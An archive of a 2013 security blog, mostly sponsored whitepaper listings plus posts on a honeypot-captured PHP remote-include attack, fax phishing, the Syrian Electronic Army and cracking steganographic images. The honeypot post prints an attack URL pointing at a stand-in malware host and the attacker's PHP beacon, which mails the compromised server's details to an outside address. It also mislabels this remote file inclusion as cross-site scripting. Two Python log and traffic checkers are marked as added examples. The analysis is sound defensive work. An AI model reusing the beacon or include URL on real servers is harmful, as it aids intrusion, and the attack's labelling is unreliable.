[1] An effective SSL Management System provides for the rapid deployment of Enterprise Security, Trust and Regulatory Compliance. SSL Management enables you to confidently address security challenges, significantly reducing your business risks and operating costs. Read more about best practices for selecting an SSL Management System. [2]Request Free! [3]More Information...
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_como06 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_como06 3. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_como06

3.8.7

304% Return on Investment with SilverSky Network Security Solutions (2013-08-08 14:32)

The following is external content provided as a free resource for blog readers.

[1] Download this study to learn how to evaluate the potential financial impact of SilverSky security services for your organization. [2]Request Free! [3]More Information...
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_peri30
2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_peri30
3. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_peri30

3.8.8

SilverSky Email Encryption Demo (2013-08-08 14:32)

The following is external content provided as a free resource for blog readers.

[1] SilverSky owns and operates the infrastructure, so no software is required at the organization level, minimizing cost and staff upkeep. The solution offers a variety of customizable tracking and reporting capabilities through a web portal, and all messages can be stored for compliance purposes with SilverSky Email Archive. [2]Request Free! [3]More Information...
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_peri31 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_peri31 3. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_peri31

3.8.9

Email Data Loss Prevention (DLP) (2013-08-08 14:32)

The following is external content provided as a free resource for blog readers.

[1] Watch this video to see firsthand how SilverSky's policy-driven Email Data Loss Prevention solution provides unmatched security and privacy at a fraction of the cost and complexity of old fashioned appliance and end-point approaches. [2]Request Free! [3]More Information...
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_peri32 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_peri32 3. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_peri32

3.8.10

The Evolution and Value of Purpose-Built Backup Appliances (2013-08-08 20:47)

The following is external content provided as a free resource for blog readers.

[1] Customer strategies for data protection and recovery continue to be dictated by aggressive SLAs, rapid recovery, and ease of integration in existing environments. As a result, firms are embracing more disk-based data protection technologies, including Purpose-Built Backup Appliances (PBBAs) to protect and recover data and applications. These appliances include features such as data deduplication, compression, encryption, and replication. Meanwhile, unabated data growth continues to pressure IT staff and protection and recovery processes, leading customers to consider alternative backup methods and targets. This IDC White Paper explores the increased use and adoption patterns of PBBAs, both integrated and targeted, and the utility these appliances provide to customers in their data protection processes. In addition, this White Paper illuminates the customer value that Symantec's Backup Exec and NetBackup appliances bring to the data protection and recovery process. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_sym139 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_sym139

3.8.11

Symantec Intelligence Report: June 2013 (2013-08-13 22:47)

The following is external content provided as a free resource for blog readers.

[1] In this month's report we take a look at what has happened in a number of key sections of the threat landscape. We delve deeper into the trends surrounding vulnerabilities, including zero-day, browser, and plug-in vulnerabilities. We also take a look at phishing trends over the last few months, as well as what has been happening in both the spam and malicious code areas of the threat landscape. Finally we include the latest high-level stats surrounding data breaches in June. We've also provided a run-down on the biggest security stories for the month of June, recapping what happened and what that means to our readers. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_sym144 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_sym144

3.8.12

HP StoreOnce: Boldly Go Where No Deduplication Has Gone Before (2013-08-15 12:32)

The following is external content provided as a free resource for blog readers.

[1] This paper will describe the challenges of data protection, why deduplication is critical to meeting the challenges, how HP is achieving its vision of federated dedupe with StoreOnce, and what HP's StoreOnce VSA announcement and achievement means to backup services providers, enterprises with remote or branch offices, and small and medium businesses as well. Sponsored by HP and Intel Xeon processors. Intel, the Intel logo, Xeon, and Xeon Inside are trademarks or registered trademarks of Intel Corporation in the U.S. and/or other countries. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_hp384 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_hp384

3.8.13

A Look At A Simple PHP Cross Site Scripting Attack (2013-08-18 02:00)

Someone was recently kind enough to attack my honeypot with an extremely simple PHP cross site scripting attack, suitable for teaching others. How does a PHP cross site scripting attack work? Some PHP scripts allow loading of external scripts through special HTTP parameters. For example, an attacker could invoke a PHP cross site scripting attack against a vulnerable file using a URL such as:

http://myhoneypot.net/scripts/php/vulnerablescript.php?src=http://malwaresite.info/malware.php

The above attack would result in vulnerablescript.php executing malware.php. One of the simplest attacks I've seen is detailed in the following lines:

<?php
$language = 'eng';
$auth = 0;
$name = ''; // md5 Login
$pass = ''; // md5 Password
/****************************************************************
 ***************************************************************
 *******************************/
error_reporting(0);
// Gather what the attacker wants to know: the time, the requesting IP, and the
// compromised server's IP address, hostname and the exact URL that was exploited.
$time_shell = ''.date('d/m/Y - H:i:s').'';
$ip_remote = $_SERVER['REMOTE_ADDR'];
$from_shellcode = 'setoran@'.gethostbyname($_SERVER['SERVER_NAME']).'';
$to_email = 'komixobh@gmail.com';
$server_mail = ''.gethostbyname($_SERVER['SERVER_NAME']).' - '.$_SERVER['HTTP_HOST'].'';
$linkcr = 'Ni Bos Link Nya : '.$_SERVER['SERVER_NAME'].''.$_SERVER['REQUEST_URI']." - IP Yang Gunain : $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
// Mail the beacon to the attacker; the @ suppresses any error output.
@mail($to_email, $server_mail, $linkcr, $header);
?>

In this attack, the server sends an email message to komixobh@gmail.com providing the server name and URL exploited. This effectively tells the attacker where their scanning script succeeded, so that they can attack with more advanced scripts. Quite genius really: don't let the server admin see your full capabilities in case it's a honeypot. Unfortunately for our attacker, this script reveals his email address (komixobh@gmail.com), which is now posted publicly on my blog. My blog is frequented by spam crawlers on a regular basis, so hopefully komixobh enjoys speaking with Nigerian Princes and receiving offers for male enhancement drugs.

The exploit really is that simple though: write a PHP script, upload it somewhere, and exploit vulnerable scripts with cross site scripting. This is why it's important to always maintain current security patches, and follow vendor and industry best practices for securing your web applications. You can see more example PHP scripts at my [1]Malware Analysis Google Code page.
1. https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/www-honeypot/raw-files/
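The pattern above, an absolute URL handed to a script parameter such as src=, is easy to pick out of web server logs. The following Python is an added example, not code from the post or the honeypot: it parses Apache combined-format access log entries and flags requests whose query parameters carry a remote URL (including percent-encoded ones), collecting the remote hosts for blocklist review. The log lines, IPs and timestamps are constructed; myhoneypot.net and malwaresite.info are the post's illustrative names.

```python
"""Flag remote-include attempts (attacker-supplied URLs in query parameters)
in Apache combined-format access logs.

Added example for this post, not the honeypot's own code. Log lines, IPs
and timestamps below are constructed; myhoneypot.net and malwaresite.info
are the post's illustrative names, not real indicators.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format: host ident user [time] "method path proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Schemes that let a PHP include()/require() pull code from another server.
REMOTE_SCHEMES = ("http", "https", "ftp", "ftps")


def remote_params(request_path):
    """Return (name, value) pairs whose value is an absolute remote URL.

    parse_qsl percent-decodes once; the extra unquote catches double-encoded
    payloads (http%253A%252F%252F...) that a naive grep for 'http://' misses.
    """
    hits = []
    for name, value in parse_qsl(urlsplit(request_path).query, keep_blank_values=True):
        decoded = unquote(value)
        parts = urlsplit(decoded)
        if parts.scheme.lower() in REMOTE_SCHEMES and parts.netloc:
            hits.append((name, decoded))
    return hits


def scan_log(lines):
    """Return one finding dict per log line carrying a remote-include attempt."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined line: skip rather than crash
        hits = remote_params(m["path"])
        if not hits:
            continue
        findings.append({
            "src_ip": m["ip"],
            "time": m["time"],
            "script": urlsplit(m["path"]).path,
            "status": int(m["status"]),
            "params": hits,
            # Hosts the attacker wanted the script to fetch from: candidates
            # for egress blocking and for checking what else they serve.
            "remote_hosts": sorted({urlsplit(v).hostname for _, v in hits}),
        })
    return findings


# Constructed sample log: a benign request, the attempt shown in the post,
# a double-percent-encoded variant, and a request with no query string.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Aug/2013:01:55:02 +0000] "GET /scripts/php/vulnerablescript.php?src=eng HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [18/Aug/2013:01:57:41 +0000] "GET /scripts/php/vulnerablescript.php?src=http://malwaresite.info/malware.php HTTP/1.1" 200 84 "-" "libwww-perl/6.05"
198.51.100.23 - - [18/Aug/2013:01:57:42 +0000] "GET /scripts/php/other.php?page=http%253A%252F%252Fmalwaresite.info%252Fmalware.php%253F HTTP/1.1" 404 84 "-" "libwww-perl/6.05"
203.0.113.7 - - [18/Aug/2013:01:58:10 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['src_ip']} -> {f['script']} (HTTP {f['status']}) "
              f"remote hosts: {', '.join(f['remote_hosts'])}")
```

A 200 on a flagged request, as in the second line, is the case worth investigating first: it means the script accepted the parameter rather than rejecting it.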

3.8.14

How Virtualization is Key to Managing Risk for the SMB Market (2013-08-19 18:32)

The following is external content provided as a free resource for blog readers.

[1] Virtualization can save your infrastructure before an outage occurs and can also ensure an efficient recovery without data loss. Read this eBook to learn how VMware virtualization solutions can help prepare your systems for a disaster and protect your data if one does strike. [2]Request Free!

1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_vmwa86 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_vmwa86


3.8.15

Implementing Enterprise BYOD with Mobile Certificates (2013-08-21 17:33)

The following is external content provided as a free resource for blog readers.

[1] While the majority of companies now support BYOD, few have been able to effectively manage the phenomenon. Implementing a mobile certificate offers a level of stability, security, and authentication that passwords can't provide. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_como07 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_como07

3.8.16

A Look at Fax Phishing (2013-08-22 18:57)

I recently set up a new honeypot which appears to be an IT security related company. In addition to a few other hidden gems, this honeypot is complete with fake contact information for the company, including email, phone, and fax. Today I received my first hit from the honeypot - and I was very surprised when it was a phishing attempt over fax!

[1] The Phishing Attempt sent over Fax

This fax claims to be from the company's HR department, is addressed to all employees, and advertises a 6 day all-inclusive vacation at an exotic out-of-the-country location for only $129 per person. The old adage holds true here - if something sounds too good to be true, it probably is. A quick search shows that the number is very commonly used in scams, as seen [2]here and [3]here.

Of course the dead giveaway that this is a scam is that my honeypot doesn't have an HR department, and no one actually exists in the company to send such an offer out to the honeypot's nonexistent employees. I have a feeling this new honeypot will provide for some great entertainment. Stay tuned for more!
1. http://3.bp.blogspot.com/-CmiuPaSINkE/UhaVLyqE_3I/AAAAAAAAAic/dVVakjGTLGw/s1600/phishing_fax.png 2. http://800notes.com/Phone.aspx/1-866-590-7027 3. http://whocallsme.com/Phone-Number.aspx/8665907027

3.8.17

My Free Magazines! New Website! (2013-08-24 15:51)

[1] I started a new website today called My Free Magazines! It's a free resource for just about every industry, offering free magazines, whitepapers, and technical resources. Go check it out at [2]http://www.MyFreeMagazines.tk
1. http://4.bp.blogspot.com/-uXikmyMP-WY/UhkOTc-ibuI/AAAAAAAAAi8/4QhVZjLO61E/s1600/myfreemagazines-banner.jpg 2. http://www.myfreemagazines.tk/

3.8.18

Blade Server Strategies: Optimizing the Data Center (2013-08-27 16:47)

The following is external content provided as a free resource for blog readers.

[1] Blade servers bring efficiency and agility to IT infrastructures by making it easy to add and move resources and applications. In a recent study, IDC found that companies using blade servers were able to cut operating expenses by 64 percent. But to extract the optimal benefits from blade servers, IT shops must choose a vendor whose strategy and tools reduce complexity, simplify management, support lifecycle automation and deliver the flexibility to work in any environment. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_hp385 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_hp385

3.8.19

Why the Syrian Electronic Army Didn't Hack the NY Times (2013-08-27 20:18)

I'm just going to come out and say it. The Syrian Electronic Army (SEA) is a fraud. They didn't hack the New York Times, or any other high visibility websites today.

[1] All SEA did today was an extremely old trick: [2]domain hijacking. For those not familiar with it, here's a [3]great writeup on how domain hijacking works. Now, it's possible that SEA performed the [4]domain hijacking through a compromise of [5]MelbourneIT, but this in itself is also unlikely, based upon their previous successful attacks, which used low-tech spearphishing (targeted social engineering) to obtain credentials of target organizations. Previously, the Syrian Electronic Army gained control of the Associated Press Twitter account, The Onion's Twitter account, and the advertising service Outbrain, all through spearphishing attacks.

Sensationalize their hacking abilities all you want. The Syrian Electronic Army has so far displayed very little technical skill, instead attacking soft targets and using social engineering. While these attacks have so far been effective, they only point out the lack of security awareness training in today's workforce, and not any serious software flaws. Any organization which has been directly hit by SEA (and that excludes the victims of domain hijacking) should seriously reexamine their employee security awareness training, and possibly consider bringing in an outside consulting company to help identify deficiencies. The weakest link in any network will always be uneducated users.
1. http://1.bp.blogspot.com/-hERMuNIOauM/Uh0_cKAz7II/AAAAAAAAAjY/Pr50ba7bxlE/s1600/sea-fraud.jpg
2. http://www.theregister.co.uk/2013/08/27/twitter_ny_times_in_domain_hijack/
3. http://secretgeek.net/sg_hijack_1.asp
4. http://labs.alienvault.com/labs/index.php/2013/several-domains-including-new-york-times-and-twitter-ones-attacked-by-syrian-electronic-army/
5. http://www.melbourneit.com.au/

3.8.20

#ALERT: As Tensions Escalate with Syria, Beware Phishing Attacks (2013-08-27 23:21)

As tensions escalate with [1]Syria, it is highly probable that phishing attacks will begin accompanying real news articles. A common tactic used by malware writers and phishing senders is to exploit recent news to get you to download their malicious files. This could be through a well crafted email with an embedded link, or an infected attachment, claiming to be a real news article. The most important step you can take is to be vigilant, and don't click on links within emails, even if they appear to originate from friends. A common tactic now used by scammers and phishers is to compromise someone's email account, then use that email account to send messages to the person's contacts. Also, don't expect this to just be through email. Many spammers and phishers are now using social media, including Facebook and Twitter messages.

Know the signs of targeted spear phishing. If you work for the government, or are employed by a government contractor, you will be a prime target. Spearphishing directed towards you may appear very credible, and may even be sent to your work email address. Stay Vigilant.
1. http://www.bbc.co.uk/news/world-us-canada-23845800

3.8.21

Anon Steganography Cracked, Further Mysteries Lie Within (2013-08-30 01:10)

Flashback to January of this year, when I posted that Anonymous has most likely been [1]infiltrated by multiple organizations (including law enforcement and terror organizations) and may be [2]unwillingly distributing terrorist messages. I have finally successfully cracked open one of the Anonymous-related images suspected of containing steganography... and I'm quite intrigued by its contents. As far as I know, this is only the second steganographic image found in the wild which has been successfully cracked. The first image was posted online by NBC [3]back in 2001 as part of a news story, and had a very simple password of "abc".

First, a little background. In my previous post, I revealed that a suspected steganography image had been posted by the Twitter user @57UN, who was very involved and influential with Anonymous. Ever since, I've been keeping tabs on @57UN, looking for unusual behavior. Well, wouldn't you know it, they didn't disappoint me! Recently @57UN switched their account name to @TechoPirate, then shortly after disappeared completely. Since then, a new @57UN account has appeared, but I suspect it is not the original @57UN.

[4] Anonymous discussing @57UN aka @TechoPirate

Shortly after I noticed @TechoPirate had disappeared, I immediately began archiving and analyzing his/her twitpic files before they disappeared from the web for good. Running Stegdetect, I found several additional files with suspected embedded data which I had originally overlooked. Interestingly enough, two of the files were embedded using Outguess, instead of jphide, which the previous files were found to use. I was actually able to crack both files. The first file to be cracked is the image below, which used the password " sophia" (note the space at the beginning).

[5]

Original image as posted on Twitpic

C:\Users\Ken\Projects\stegdetect>stegbreak.exe -r rules.ini -f C:\Users\Ken\Projects\dictionary\eNtr0pY_ALL_sort_uniq.dic -t o C:\Users\Ken\Projects\stegdetect\target\687336425.jpg
Loaded 1 files...
C:\Users\Ken\Projects\stegdetect\target\687336425.jpg : outguess[v0.13b]( sophia)[Encore unsupported executable not stripped][U. $.. $......H..]
Processed 1 files, found 1 embeddings.
Time: 0 seconds: Cracks: 2584, Inf c/s

Since this file had such a weak password, I was able to crack it in under one second. ...but that's where the real mystery begins! You see, the embedded file itself is unintelligible, but detected by both Stegdetect and [6]VirusTotal as an "Encore unsupported executable not stripped". I'm not familiar with this type of file, so if anyone would care to enlighten me, please feel free to post in the comments section below. I really need some help figuring out just what this file is - and doing so may crack wide open the case of who's really pulling the strings behind Anonymous. For those interested in trying to figure out what the file is/does, I have it uploaded here: [7]https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/steg/687336425.txt

CAUTION: This file is an unknown type, and of unknown origin. It could be malicious in nature, so be wary. I have given the file a .txt extension in case it is malicious.

Note that a second file was also cracked. However, attempts to extract the data using Outguess have shown that the embedded data is corrupt and irretrievable. Should future attempts to extract the data be successful, I will post on the blog. The second file has a password of "15March1009".

Now, here are a few questions which need to be answered, besides the obvious "what is this file?":
- Does Anonymous know they're distributing files with embedded data?
- Is Anonymous adding this data, or is it being added by a 3rd party, using Anonymous as mules?
- How long has this been going on? The file above is almost a year old.
- Are there other accounts distributing steganography images?
- Why did @57UN suddenly disappear? Rumors are that he/she was hacked, but was it something else?
- Finally, just who is pulling the strings behind Anonymous?
If you'd like to replicate my results, the original image file has been uploaded to [8]http://i.imgur.com/JR26qcb.jpg in case the original ([9]http://twitpic.com/bd806h) goes down. Stegdetect is freely available from [10]http://www.outguess.org/. The version of Outguess used to extract the embedded file is available for download at [11]http://www.mirrorservice.org/sites/ftp.wiretapped.net/pub/security/steganography/outguess/

Many thanks to [12]@heinbrian, [13]@phra95w17ch, and [14]@Impatient4truth for helping me locate the old version of Outguess needed to extract the file contents. As an alternative to posting a comment, you can also contact me through email: CaffSecBlog <at> Gmail <dot> com.

UPDATE 1: I've received some comments stating that this might be a false positive. As such, I've used FotoForensics to do some additional analysis. First, I located the top photo in the original image file, and ran it through [15]FotoForensics.

[16]

Next I [17]performed a FotoForensics analysis on the steganography image.

[18]

This appears to be pretty consistent with the results I previously encountered, in that the image appears to have small pixel tweaks, resulting in a higher ELA.

1. http://caffeinesecurity.blogspot.com/2013/01/anonymous-must-remove-the-mask.html
2. http://caffeinesecurity.blogspot.com/2013/01/anonymous-and-steganography-blindly.html
3. http://www.citi.umich.edu/u/provos/stego/abc.html
4. http://4.bp.blogspot.com/-ZM4698plEUk/UiAfpbE6dUI/AAAAAAAAAkE/shBxqOFB1c4/s1600/57un-id.png
5. http://1.bp.blogspot.com/-HryBYE_fgmE/UiAenLqfUjI/AAAAAAAAAj8/L61qUksQCLE/s1600/57UN-687336425.png
6. https://www.virustotal.com/en/file/bd7aca97863a678eb69475432794e4161e7999907e5f436269b14edc30249cd5/analysis/1377835730/
7. https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/steg/687336425.txt
8. http://i.imgur.com/JR26qcb.jpg
9. http://twitpic.com/bd806h
10. http://www.outguess.org/
11. http://www.mirrorservice.org/sites/ftp.wiretapped.net/pub/security/steganography/outguess/
12. https://twitter.com/heinbrian
13. https://twitter.com/phra95w17ch
14. https://twitter.com/Impatient4truth
15. http://fotoforensics.com/analysis.php?id=37c1c7519c36da44e7c40ab70a3fd4a7f98af752.57822
16. http://2.bp.blogspot.com/-e0RW2pQEID8/UiC0ApUqw2I/AAAAAAAAAkU/yb7RT4Zu-uw/s1600/ff-image1.png
17. http://fotoforensics.com/analysis.php?id=2315825cc66422cc92285e6d213a018f924554df.147161
18. http://3.bp.blogspot.com/-bpiBdUM4s-U/UiC0WMSFpNI/AAAAAAAAAkc/DOM2ETOH5Es/s1600/ff-image2.png

3.8.22

How to Avoid the Coming Backup Crunch (2013-08-30 16:33)

The following is external content provided as a free resource for blog readers.

[1] Dell's critically acclaimed AppAssure enables IT to capture continuous backup snapshots, automate recoverability testing and offload data deduplication/compression. As a result, businesses can successfully fulfill rapidly escalating data protection requirements using minimal infrastructure and human resources, allowing them to redirect resources to genuinely strategic technology initiatives. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_delb13 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_delb13

3.8.23

Dell AppAssure 5: Free Trial Download (2013-08-30 16:33)

The following is external content provided as a free resource for blog readers.

[1] Register now to check out this free trial. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_delb12 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_delb12

3.9

September

3.9.1

Android for the Paranoid - Radiation Alarm (2013-09-02 19:02)

I haven't done an Android for the Paranoid article lately, so I was absolutely glowing when I stumbled across [1]Radiation Alarm. This nifty little app lets you know if your phone is detecting any harmful radiation. How does it do that? The science behind the app is pretty simple - if you cover your cellphone camera with a dark piece of paper or tape over the cell phone, light won't pass through, but radiation will still hit the camera's CMOS sensor, causing pixels to light up.

[2] My Radiation reading after calibration

A neat trick I found works well is to slip a small piece of a floppy disk inside the camera's case, so that it covers the phone's camera. This way light can't pass through, and I don't have to worry about making my camera lens sticky or blurry. Best of all, the piece of floppy disk can be hidden behind the camera battery when not in use. NOTE: Using a piece of a floppy disk may generate false positives if your phone is pointed at a light source, or used in a very bright area. While I don't have a radioactive source available to me, the science behind this is sound, and reinforced by this YouTube video, which shows what a cellphone camera looks like when exposed to radiation.

[EMBED]

When you install and calibrate this app for the first time, you should be away from any known radiation sources. For example, if you live in a brick house, you should actually calibrate your app in a location away from any brick buildings. After all, brick houses do [3]give off low levels of radiation. Of course, if you live anywhere near Fukushima or Chernobyl, you might have a hard time calibrating this.
1. https://play.google.com/store/apps/details?id=eu.camdetector.radiationalarm 2. http://3.bp.blogspot.com/-O95J4v-1xCU/UiUVzMGPSRI/AAAAAAAAAkw/xbtvHhBN-0E/s1600/radiation+alarm.png 3. http://hps.org/publicinformation/ate/q9778.html

3.9.2

Eagle Bank Uses Single Sign-On to Secure Deposits and Customer Data (2013-09-04 19:31)

The following is external content provided as a free resource for blog readers.

[1] When a security audit revealed the bank's password-protection vulnerability, Eagle Bank, a mutual bank with over $430 million in assets, turned to Imprivata OneSign Single Sign-On (SSO) technology. If you are an IT professional in banking or financial services, then this case study that details how OneSign alleviated Eagle Bank's password problems and increased system security is a must read. [2]Request Free!

1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_impr22 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_impr22

3.9.3

How Single Sign-On Helped Republic Bank Relieve Password Headaches (2013-09-04 19:31)

The following is external content provided as a free resource for blog readers.

[1] Republic Bank's employees were struggling to remember the complex passwords required to access the bank's critical software applications. If you are an IT professional in banking or financial services, then you'll want to watch this recorded webinar. In it, you'll hear from a security expert at Republic Bank who shares experiences on how his bank used Imprivata OneSign Single Sign-On technology to reduce the number of passwords and log-ins required of employees, mitigate the risks of password sharing, and ensure compliance with industry regulations. [2]Request Free!

1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_impr24 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_impr24

3.9.4

Exchange ActiveSync and BYOD: Potential for Disaster or Foundation for Mobile Success (2013-09-05 13:32)

The following is external content provided as a free resource for blog readers.

[1] Wednesday, September 11th @ 2 pm ET / 11 am PT. Join Exchange MVP Tony Redmond and Brian Reed of BoxTone to learn:

- Key challenges facing Exchange organizations in an increasingly mobile world
- Approaches to avoid pitfalls and promote mobile success
- Strategies to manage the complexity of BYOD and device diversity

[2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_wind01 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_wind01

3.9.5

Legacy Applications - The Swiss Cheese of Security (2013-09-08 11:38)

Almost every organization has them... There's that one app which someone in your organization can't live without. It's probably from back in the 1990s, and the developer no longer supports it, if they're even in business anymore. Sometimes the app was never replaced simply due to lack of funding; other times a replacement simply doesn't exist. To make matters worse, this app probably requires additional unsupported software, such as Java 1.4.2 or even Microsoft Java Virtual Machine. Bonus points if the app also requires an unsupported operating system, such as Windows 2000.

As a security practitioner, what can you do to help secure these applications which introduce gaping holes into your organization's network? Do some research, and identify multiple plans of attack to address the Swiss Cheese. Present these plans to management, and get their buy-in. Remember, any attempts to secure these legacy applications will inconvenience their users, so management approval is a must.

1) Investigate alternatives - It's very possible that someone else has run into the same problem as you, and has created a solution. This won't be without a little bit of work, however. For example, if your custom app requires an Oracle database backend, consider migrating to [1]Postgres, which is Free Open Source Software.

2) Air Gapping - If possible, disconnect your legacy application from the network completely, and require that any data transferred to/from the application go through removable media.

3) Isolation - If your legacy application must have network access, place the system in an isolated VLAN. The principle of least privilege applies - only give the system access to the IP addresses and ports which it absolutely must have to function.

4) Implement Intrusion Prevention - Network Intrusion Prevention and Host Intrusion Prevention systems can be used to extend the life of unsupported applications. Often these systems will be able to catch attempts to exploit the application, such as buffer overflows or cross-site-scripting attacks.

5) Risk Based Decision - Finally, if the legacy application isn't being removed from your organization, a risk-based-decision memo should be signed by upper management. Ensure that management clearly understands the risks involved with continuing to use the unsupported software, including attack vectors, mitigations in place, and the likely results of a compromise. This way management agrees to assume the risk associated with continuing to use the application, and can't claim ignorance should the application ever be compromised in the future.

Do you have any additional suggestions for addressing legacy applications? If so, please share!
1. http://wiki.postgresql.org/wiki/Oracle_to_Postgres_Conversion
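A small check for step 3 above (isolation with least privilege), added here as an example and not code from the blog post: given an allowlist of the only peers the legacy host may talk to, it flags any flow record that steps outside that policy. The host address, the policy and the flow records are all constructed.

```python
# Added example (not the blog post's code): least-privilege allowlist check for
# an isolated legacy host. Flow records and the policy below are constructed.
import ipaddress
from collections import namedtuple

LEGACY_HOST = "10.50.0.10"  # constructed: the legacy box in its own VLAN
# Constructed policy: the only peers the legacy host may talk to, by direction.
OUTBOUND = {("10.50.0.20", 1521, "tcp")}  # its database backend, nothing else
INBOUND = {("10.0.0.7", 3389, "tcp")}  # the admin jump host, RDP only

Flow = namedtuple("Flow", "src dst dport proto")

def parse_flow(line):
    """Parse one "src,dst,dst_port,proto" record; ValueError on bad IP/port."""
    src, dst, port, proto = (f.strip() for f in line.split(","))
    ipaddress.ip_address(src)
    ipaddress.ip_address(dst)
    return Flow(src, dst, int(port), proto.lower())

def violations(lines, host=LEGACY_HOST, outbound=OUTBOUND, inbound=INBOUND):
    """Return flows touching the legacy host that the policy does not permit."""
    bad = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        flow = parse_flow(line)
        if flow.src == host:
            ok = (flow.dst, flow.dport, flow.proto) in outbound
        elif flow.dst == host:
            ok = (flow.src, flow.dport, flow.proto) in inbound
        else:
            continue  # traffic between other hosts is outside this check
        if not ok:
            bad.append(flow)
    return bad

SAMPLE_FLOWS = """\
# constructed flow records: src,dst,dst_port,proto
10.50.0.10,10.50.0.20,1521,tcp
10.0.0.7,10.50.0.10,3389,tcp
10.50.0.10,10.0.0.5,80,tcp
10.50.0.10,8.8.8.8,53,udp
10.0.0.9,10.50.0.10,445,tcp
""".splitlines()

if __name__ == "__main__":
    for v in violations(SAMPLE_FLOWS):
        print(f"ALERT outside policy: {v.src} -> {v.dst}:{v.dport}/{v.proto}")
```

Run against the constructed records it reports the web, DNS and SMB flows and stays quiet on the two permitted ones; the same allowlist can be used to write the VLAN's firewall rules so that policy and detection agree.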

3.9.6

Staying Secure in a Cloudy World (2013-09-16 17:32)

The following is external content provided as a free resource for blog readers.

[1] Organizations that deploy public, private or hybrid cloud infrastructures (which today is virtually all of them) must mitigate inherent security risks while also maintaining compliance with industry and government regulations. This paper contains three simple steps for maintaining visibility and control when moving to the cloud and explains how NetIQ can help with each:

- Reduce risk
- Improve threat response
- Reduce the compliance effort

Fortunately, advances in information security and compliance management technologies have empowered cloud-computing users to reduce risk, improve threat response and drastically reduce the effort needed for compliance management. And NetIQ is leading the charge. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_neti22 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_neti22

3.9.7

Real-Time Security Intelligence for Greater Visibility and Information-Asset Protection (2013-09-16 17:32)

The following is external content provided as a free resource for blog readers.

